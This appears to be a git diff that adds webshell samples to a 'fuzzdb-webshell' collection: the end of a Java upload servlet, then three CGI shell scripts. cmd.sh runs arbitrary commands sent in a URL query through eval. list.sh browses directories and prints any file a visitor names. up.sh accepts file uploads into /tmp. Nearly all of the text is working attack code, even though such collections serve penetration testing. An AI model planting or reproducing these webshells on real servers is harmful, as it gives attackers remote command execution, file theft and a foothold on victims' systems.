FileOutputStream fileout = new FileOutputStream(newfile);
|
||||
|
||||
for(int i=0; i < req.getContentLength() - tag.length() - contador - 11; i++) {
|
||||
c=post.read();
|
||||
fileout.write((char)c);
|
||||
}
|
||||
|
||||
fileout.close();
|
||||
out.print("<== OK");
|
||||
|
||||
}
|
||||
|
||||
|
||||
public String getServletInfo() {
|
||||
return "UpServlet 0.1";
|
||||
}
|
||||
|
||||
}
|
372
fuzzdb-webshell/sh/cmd.sh
Normal file
372
fuzzdb-webshell/sh/cmd.sh
Normal file
|
@ -0,0 +1,372 @@
|
|||
#!/bin/sh
|
||||
#
|
||||
# SH_KIT
|
||||
#
|
||||
# cmd.sh = Command Execution
|
||||
#
|
||||
# by: Ludoz
|
||||
# modified: 23/04/2004
|
||||
#
|
||||
# Version 1.2 - 28/5/2003
|
||||
#
|
||||
|
||||
###
|
||||
###
|
||||
### Configuracion
|
||||
###
|
||||
###
|
||||
|
||||
#
|
||||
# sitios donde buscar ejecutables necesarios, sin la / posterior, separados por espacios
|
||||
#
|
||||
PATHS="/bin /usr/bin /sbin /usr/sbin /usr/local/bin /usr/local/sbin /usr/ucb /usr/libexec /tmp /usr/tmp /var/tmp ."
|
||||
|
||||
###
|
||||
###
|
||||
### La configuracion acaba aqui
|
||||
###
|
||||
###
|
||||
|
||||
#
|
||||
# PATHs mas habituales de los 3 comandos base
|
||||
#
|
||||
TEST="/usr/bin/test"
|
||||
BASENAME="/bin/basename"
|
||||
DIRNAME="/usr/bin/dirname"
|
||||
|
||||
# compruebo TEST, BASENAME y DIRNAME y si estan mal intento encontrarlas en el path y sino en PATHS
|
||||
if (eval $TEST \"1\" = \"1\" ); then
|
||||
TEST=$TEST
|
||||
else
|
||||
for i in $PATHS ; do
|
||||
TEST="$i/test"
|
||||
if (eval $TEST \"1\" = \"1\" ); then
|
||||
break
|
||||
fi
|
||||
done
|
||||
if (eval $TEST \"1\" = \"1\" ); then
|
||||
TEST=$TEST
|
||||
else
|
||||
TEST=test
|
||||
if (eval $TEST \"1\" = \"1\" ); then
|
||||
TEST=$TEST
|
||||
else
|
||||
TEST=""
|
||||
echo ERROR: No he encontrado TEST en el sitio especificado ni en el path
|
||||
echo
|
||||
exit
|
||||
fi
|
||||
fi
|
||||
fi
|
||||
|
||||
if (eval $TEST \"`eval $BASENAME .`\" = \".\" ); then
|
||||
BASENAME=$BASENAME
|
||||
else
|
||||
for i in $PATHS ; do
|
||||
BASENAME="$i/basename"
|
||||
if (eval $TEST \"`eval $BASENAME .`\" = \".\" ); then
|
||||
break
|
||||
fi
|
||||
done
|
||||
if (eval $TEST \"`eval $BASENAME .`\" = \".\" ); then
|
||||
BASENAME=$BASENAME
|
||||
else
|
||||
BASENAME=basename
|
||||
if (eval $TEST \"`eval $BASENAME .`\" = \".\" ); then
|
||||
BASENAME=$BASENAME
|
||||
else
|
||||
BASENAME=""
|
||||
echo ERROR: No he encontrado BASENAME en el sitio especificado ni en el path
|
||||
echo
|
||||
exit
|
||||
fi
|
||||
fi
|
||||
fi
|
||||
|
||||
if (eval $TEST \"`eval $DIRNAME .`\" = \".\" ); then
|
||||
DIRNAME=$DIRNAME
|
||||
else
|
||||
for i in $PATHS ; do
|
||||
DIRNAME="$i/dirname"
|
||||
if (eval $TEST \"`eval $DIRNAME .`\" = \".\" ); then
|
||||
break
|
||||
fi
|
||||
done
|
||||
if (eval $TEST \"`eval $DIRNAME .`\" = \".\" ); then
|
||||
DIRNAME=$DIRNAME
|
||||
else
|
||||
DIRNAME=dirname
|
||||
if (eval $TEST \"`eval $DIRNAME .`\" = \".\" ); then
|
||||
DIRNAME=$DIRNAME
|
||||
else
|
||||
DIRNAME=""
|
||||
echo ERROR: No he encontrado DIRNAME en el sitio especificado ni en el path
|
||||
echo
|
||||
exit
|
||||
fi
|
||||
fi
|
||||
fi
|
||||
|
||||
#echo "Info: TEST: $TEST"
|
||||
#echo "Info: BASENAME: $BASENAME"
|
||||
#echo "Info: DIRNAME: $DIRNAME"
|
||||
|
||||
if (eval $TEST -x \"/usr/bin/unalias\" ); then
|
||||
# si existe el comando: unalias *
|
||||
/usr/bin/unalias *
|
||||
else
|
||||
# si es interno: unalias -a
|
||||
unalias -a
|
||||
fi
|
||||
|
||||
#
|
||||
# A partir de aqui deberia ser 100% multisistema
|
||||
#
|
||||
|
||||
buscaexec ()
|
||||
{
|
||||
BUSCAEXECRES=""
|
||||
if (eval $TEST -z \"$BUSCAEXECPAR\" ); then
|
||||
return;
|
||||
fi
|
||||
if (eval $TEST -x \"$BUSCAEXECPAR\" ); then
|
||||
BUSCAEXECRES=$BUSCAEXECPAR
|
||||
return;
|
||||
fi
|
||||
|
||||
BUSCAEXECPAR=`eval $BASENAME $BUSCAEXECPAR`
|
||||
|
||||
for i in $PATHS $PATH ; do
|
||||
if (eval $TEST -x \"$i/$BUSCAEXECPAR\" ); then
|
||||
BUSCAEXECRES="$i/$BUSCAEXECPAR"
|
||||
break
|
||||
fi
|
||||
done
|
||||
|
||||
if (eval $TEST -n \"$BUSCAEXECRES\" ); then
|
||||
return;
|
||||
fi
|
||||
|
||||
if (eval $TEST -z \"$WHICH\" ); then
|
||||
return;
|
||||
fi
|
||||
|
||||
BUSCAEXECRES=`eval $WHICH $BUSCAEXECPAR`
|
||||
if (eval $TEST -n \"$BUSCAEXECRES\" ); then
|
||||
if (eval $TEST ! -x \"$BUSCAEXECRES\" ); then
|
||||
BUSCAEXECRES=""
|
||||
fi
|
||||
fi
|
||||
}
|
||||
|
||||
|
||||
#
|
||||
# Definicion de comandos concretos para el script
|
||||
#
|
||||
|
||||
WHICH=""
|
||||
BUSCAEXECPAR=/usr/bin/which
|
||||
buscaexec
|
||||
WHICH=$BUSCAEXECRES
|
||||
|
||||
if (eval $TEST -z \"$WHICH\" ) ; then
|
||||
if (eval $TEST \"$TEST\" != \"test\" ) ; then
|
||||
TESTCMD=$TEST
|
||||
TESTRES="test"
|
||||
elif (eval $TEST \"$BASENAME\" != \"basename\" ) ; then
|
||||
TESTCMD=$BASENAME
|
||||
TESTRES="basename"
|
||||
elif (eval $TEST \"$BASEDIR\" != \"basedir\" ) ; then
|
||||
TESTCMD=$BASEDIR
|
||||
TESTRES="basename"
|
||||
fi
|
||||
|
||||
if (eval $TEST -n \"$TESTCMD\"); then
|
||||
OLDPATH=$PATH
|
||||
|
||||
TESTPATH="`eval $BASEDIR $TESTCMD`"
|
||||
PATH="$TESTPATH:$PATH"
|
||||
TESTPATH=""
|
||||
PRUEBA="`eval $BASENAME \"\`which $TESTRES\`\" `"
|
||||
if (eval $TEST \"$PRUEBA\" = \"TESTRES\" ) ; then
|
||||
WHICH="`which which`"
|
||||
else
|
||||
WHICH=""
|
||||
fi
|
||||
PRUEBA=""
|
||||
|
||||
PATH=$OLDPATH
|
||||
OLDPATH=""
|
||||
TESTRES=""
|
||||
TESTCMD=""
|
||||
fi
|
||||
|
||||
fi
|
||||
|
||||
BUSCAEXECPAR=/bin/echo
|
||||
buscaexec
|
||||
ECHO=$BUSCAEXECRES
|
||||
|
||||
if (eval $TEST -z \"$ECHO\" ) ; then
|
||||
ECHO=echo
|
||||
fi
|
||||
|
||||
A="`eval $ECHO \"a\"`"
|
||||
if (eval $TEST \"$A\" = \"a\" ) ; then
|
||||
ECHO=$ECHO
|
||||
else
|
||||
ECHO=""
|
||||
#nota mental: para que hago echo si echo no funciona!? :)
|
||||
echo ERROR: No he encontrado ECHO en el sitio especificado ni en el path
|
||||
echo
|
||||
exit
|
||||
fi
|
||||
A=""
|
||||
|
||||
|
||||
|
||||
BUSCAEXECPAR=/bin/cut
|
||||
buscaexec
|
||||
CUT=$BUSCAEXECRES
|
||||
BUSCAEXECPAR=/bin/sed
|
||||
buscaexec
|
||||
SED=$BUSCAEXECRES
|
||||
BUSCAEXECPAR=/usr/bin/expr
|
||||
buscaexec
|
||||
EXPR=$BUSCAEXECRES
|
||||
|
||||
|
||||
FORMULARIO="`eval $BASENAME $0`"
|
||||
|
||||
eval $ECHO \"Content-type: text/html\"
|
||||
eval $ECHO
|
||||
eval $ECHO \"\<html\>\<title\>CMD.SH\<\/title\>\<body\>\"
|
||||
eval $ECHO \"\<p\>\<form method\=\\\"GET\\\" name\=\\\"myform\\\" action\=\\\"$FORMULARIO\\\"\>\<\/p\>\"
|
||||
eval $ECHO \"\<input type\=\\\"text\\\" name\=\\\"cmd\\\"\>\"
|
||||
eval $ECHO \"\<input type\=\\\"submit\\\" value\=\\\"Enviar\\\"\>\"
|
||||
eval $ECHO \"\<pre\>\"
|
||||
|
||||
#
|
||||
# La variable QUERYSTRING contiene la info que quiero
|
||||
#
|
||||
|
||||
#echo QUERY_STRING=$QUERY_STRING
|
||||
if (eval $TEST -n \"$QUERY_STRING\"); then
|
||||
|
||||
PARAM=`eval $ECHO \"$QUERY_STRING\" | $CUT \-d\= \-f2 | $SED \-e s\/\+\/\ \/g `
|
||||
|
||||
hex2dec()
|
||||
{
|
||||
if (eval $TEST \"$PARC\" \= \"0\" ); then
|
||||
PARC="0"
|
||||
elif (eval $TEST \"$PARC\" \= \"1\" ); then
|
||||
PARC="1"
|
||||
elif (eval $TEST \"$PARC\" \= \"2\" ); then
|
||||
PARC="2"
|
||||
elif (eval $TEST \"$PARC\" \= \"3\" ); then
|
||||
PARC="3"
|
||||
elif (eval $TEST \"$PARC\" \= \"4\" ); then
|
||||
PARC="4"
|
||||
elif (eval $TEST \"$PARC\" \= \"5\" ); then
|
||||
PARC="5"
|
||||
elif (eval $TEST \"$PARC\" \= \"6\" ); then
|
||||
PARC="6"
|
||||
elif (eval $TEST \"$PARC\" \= \"7\" ); then
|
||||
PARC="7"
|
||||
elif (eval $TEST \"$PARC\" \= \"8\" ); then
|
||||
PARC="8"
|
||||
elif (eval $TEST \"$PARC\" \= \"9\" ); then
|
||||
PARC="9"
|
||||
elif (eval $TEST \"$PARC\" \= \"a\" ); then
|
||||
PARC="10"
|
||||
elif (eval $TEST \"$PARC\" \= \"b\" ); then
|
||||
PARC="11"
|
||||
elif (eval $TEST \"$PARC\" \= \"c\" ); then
|
||||
PARC="12"
|
||||
elif (eval $TEST \"$PARC\" \= \"d\" ); then
|
||||
PARC="13"
|
||||
elif (eval $TEST \"$PARC\" \= \"e\" ); then
|
||||
PARC="14"
|
||||
elif (eval $TEST \"$PARC\" \= \"f\" ); then
|
||||
PARC="15"
|
||||
elif (eval $TEST \"$PARC\" \= \"A\" ); then
|
||||
PARC="10"
|
||||
elif (eval $TEST \"$PARC\" \= \"B\" ); then
|
||||
PARC="11"
|
||||
elif (eval $TEST \"$PARC\" \= \"C\" ); then
|
||||
PARC="12"
|
||||
elif (eval $TEST \"$PARC\" \= \"D\" ); then
|
||||
PARC="13"
|
||||
elif (eval $TEST \"$PARC\" \= \"E\" ); then
|
||||
PARC="14"
|
||||
elif (eval $TEST \"$PARC\" \= \"F\" ); then
|
||||
PARC="15"
|
||||
else
|
||||
PARC="0"
|
||||
fi
|
||||
}
|
||||
|
||||
dec2ascii()
|
||||
{
|
||||
if (eval $TEST \"$PARC\" -eq \"0\"); then
|
||||
PARC=""
|
||||
elif (eval $TEST \"$PARC\" -lt \"32\"); then
|
||||
PARC=""
|
||||
elif (eval $TEST \"$PARC\" -eq \"34\"); then
|
||||
PARC="\\\""
|
||||
elif (eval $TEST \"$PARC\" -eq \"96\"); then
|
||||
PARC="\`"
|
||||
elif (eval $TEST \"$PARC\" -eq \"127\"); then
|
||||
PARC=""
|
||||
elif (eval $TEST \"$PARC\" -gt \"127\"); then
|
||||
PARC=""
|
||||
else
|
||||
#aun no rulan todos los caracteres, los que faltan estan impresos en la linea inferior
|
||||
# XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX " ` ?<- el resto se ignoran, son >128
|
||||
PARC="`eval $ECHO \"123456789ABCDEF0123456789ABCDEF \!X#\$%\&\'\(\)\*+,\-.\/0123456789\:\;\<=\>\?\@ABCDEFGHIJKLMNOPQRSTUVWXYZ\[\\\\\]\^_Xabcdefghijklmnopqrstuvwxyz\{\\\|\}\~X0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF\" | $CUT \-b$PARC `"
|
||||
# X: no printable, en la linea superior esta el caracter
|
||||
# los 0123456789ABCDEF es para no descontarme poniendo X cuando habia muchas seguidas
|
||||
# notese que el NULL no sale en el string
|
||||
# notese que la " y la ` estan como X en el string pq estan tratadas a parte, no se pueden tratar por el eval este
|
||||
# notese que los caracteres por debajo del 32 tampoco se tratan, y los mayores de 127 tampoco, aunque se pueden añadir... si tienes ganas ;) y los necesitas realmente
|
||||
fi
|
||||
}
|
||||
|
||||
TODO="$PARAM"
|
||||
DONE=""
|
||||
|
||||
while (eval $TEST -n \"$TODO\" ); do
|
||||
|
||||
C=`eval $ECHO \"$TODO\" | $CUT \-b1 `
|
||||
|
||||
if (eval $TEST \"$C\" = \"\%\"); then
|
||||
PARC="`eval $ECHO \"$TODO\" | $CUT \-b2 `"
|
||||
hex2dec
|
||||
C1="$PARC"
|
||||
PARC="`eval $ECHO \"$TODO\" | $CUT \-b3 `"
|
||||
hex2dec
|
||||
C2="$PARC"
|
||||
PARC="`eval $EXPR $C1 \\\* 16 \+ $C2`"
|
||||
dec2ascii
|
||||
C="$PARC"
|
||||
TODO=`eval $ECHO \"$TODO\" | $CUT \-b4\- `
|
||||
else
|
||||
TODO=`eval $ECHO \"$TODO\" | $CUT \-b2\- `
|
||||
fi
|
||||
|
||||
DONE="$DONE$C"
|
||||
|
||||
done
|
||||
|
||||
VALUE="$DONE"
|
||||
|
||||
eval $ECHO \"\\\$ $VALUE\"
|
||||
eval $VALUE
|
||||
|
||||
fi
|
||||
|
||||
eval $ECHO \"\<\/pre\>\<\/body\>\<\/html\>\"
|
||||
|
||||
exit
|
||||
|
||||
|
47
fuzzdb-webshell/sh/list.sh
Normal file
47
fuzzdb-webshell/sh/list.sh
Normal file
|
@ -0,0 +1,47 @@
|
|||
#!/bin/sh
|
||||
#
|
||||
# SH_KIT
|
||||
#
|
||||
# list.sh = Directory & File Listing
|
||||
#
|
||||
# by: The Dark Raver
|
||||
# modified: 16/12/2005
|
||||
#
|
||||
|
||||
echo Content-Type: text/html
|
||||
echo
|
||||
|
||||
if [ "$QUERY_STRING" != "" ]
|
||||
then
|
||||
echo PATH: $QUERY_STRING "<br><hr>"
|
||||
echo `ls $QUERY_STRING` > /tmp/test
|
||||
else
|
||||
echo PATH: / "<br><hr>"
|
||||
echo > /tmp/test
|
||||
QUERY_STRING="/"
|
||||
root="1"
|
||||
fi
|
||||
|
||||
out=`grep "/" /tmp/test`
|
||||
|
||||
if [ "$out" != "" ]
|
||||
then
|
||||
echo FICHERO: $QUERY_STRING
|
||||
echo "<hr><pre>"
|
||||
cat $QUERY_STRING
|
||||
else
|
||||
if [ "$root" != "1" ]
|
||||
then
|
||||
echo "( ) <a href=?"$QUERY_STRING"/..>".."</a><br>"
|
||||
fi
|
||||
for i in `ls $QUERY_STRING`
|
||||
do
|
||||
if [ "$root" == "1" ]
|
||||
then
|
||||
echo "( ) <a href=?/"$i">"$i"</a><br>"
|
||||
else
|
||||
echo "( ) <a href=?"$QUERY_STRING"/"$i">"$i"</a><br>"
|
||||
fi
|
||||
done
|
||||
|
||||
fi
|
43
fuzzdb-webshell/sh/up.sh
Normal file
43
fuzzdb-webshell/sh/up.sh
Normal file
|
@ -0,0 +1,43 @@
|
|||
#!/bin/sh
|
||||
#
|
||||
# BETA1 - upload to /tmp/upload
|
||||
#
|
||||
# SH_KIT
|
||||
#
|
||||
# up.sh = File Upload
|
||||
#
|
||||
# by: The Dark Raver
|
||||
# modified: 16/12/2005
|
||||
#
|
||||
|
||||
echo Content-Type: text/html
|
||||
echo
|
||||
|
||||
echo "<html><body>"
|
||||
echo "<form enctype=\"multipart/form-data\" action=\"\" method=\"post\">"
|
||||
echo "<p>Local File: <input name=\"userfile\" type=\"file\">"
|
||||
echo "<input type=\"submit\" value=\"Send\">"
|
||||
echo "</form><br><br><br>"
|
||||
|
||||
echo "<hr>"
|
||||
|
||||
dd count=$CONTENT_LENGTH bs=1 of=/tmp/test
|
||||
|
||||
lineas=`cat /tmp/test | wc -l`
|
||||
#echo LIN: $lineas
|
||||
lineas2=`expr $lineas - 4`
|
||||
#echo LIN2: $lineas2
|
||||
lineas3=`expr $lineas2 - 1`
|
||||
#echo LIN3: $lineas3
|
||||
|
||||
#echo "<hr>"
|
||||
|
||||
tail -$lineas2 /tmp/test > /tmp/test2
|
||||
head -$lineas3 /tmp/test2 > /tmp/upload
|
||||
#rm /tmp/test
|
||||
#rm /tmp/test2
|
||||
|
||||
echo "<pre>"
|
||||
cat /tmp/upload
|
||||
echo "</pre>"
|
||||
|
Loading…
Reference in a new issue